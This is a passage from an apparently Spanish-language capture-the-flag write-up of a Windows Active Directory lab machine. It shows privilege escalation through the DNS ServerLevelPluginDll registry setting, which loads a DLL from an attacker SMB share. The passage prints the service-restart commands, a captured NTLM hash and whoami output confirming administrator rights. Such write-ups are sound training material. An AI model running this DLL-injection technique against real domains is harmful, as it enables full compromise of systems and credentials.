Y verificamos la clave registro para comprobar que se ha injectado nuestro dll:
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Nam e ServerLevelPluginDll ServerLevelPluginDll : \\10.10.14.217\SHARE\privesc.dll PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Pa rameters\ PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS PSChildName : Parameters PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry |
Ahora lo que nos queda es reiniciar el servicio de DNS y se añadirá nuestro dll al servicio de dns, ejecutando con ello nuestro comando:
1 2 |
sc.exe stop dns sc.exe start dns |
Y como vemos en la salida de smbserver, hemos conseguido injectar el mismo:
1 2 3 4 5 6 7 8 9 10 11 |
[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.169,50329) [*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE) [*] User RESOLUTE\RESOLUTE$ authenticated successfully [*] RESOLUTE$::MEGABANK:4141414141414141:292c9135c775699a60722ec130cc5f1f:0101000000000000006729e6ab28d60176263edb280de7f0000000000100100041006700590049004d00520044006b00020010004b006e0061004c0073007100670074000300100041006700590049004d00520044006b00040010004b006e0061004c00730071006700740007000800006729e6ab28d6010600040002000000080030003000000000000000000000000040000093eb6da6581ef356a2c0a8416ff8d541974fc440df68109fe7fcbf02abb82d200a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200310037000000000000000000 |
Obteniendo la flag de root
Ahora que lo hemos ejecutado nos queda acceder con el usuario melanie y comprobar los permisos:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami /all USER INFORMATION ---------------- User Name SID ================ =============================================== megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101 GROUP INFORMATION ----------------- Group Name Type SID Attributes =============================================== ================ ============================================= =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandato ry group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Domain Admins Group S-1-5-21-1392959593-3013219662-3596683436-512 Mandatory group, Enabled by default, Enabled group MEGABANK\Denied RODC Password Replication Group Alias S-1-5-21-1392959593-3013219662-3596683436-572 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. |
Y como vemos estamos en el grupo de administradores, así que vamos a por nuestra flag:
1 2 3 4 5 6 7 8 9 10 11 |
*Evil-WinRM* PS C:\Users\melanie\Documents> cd c:\users\administrator\desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2019 7:32 AM 32 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.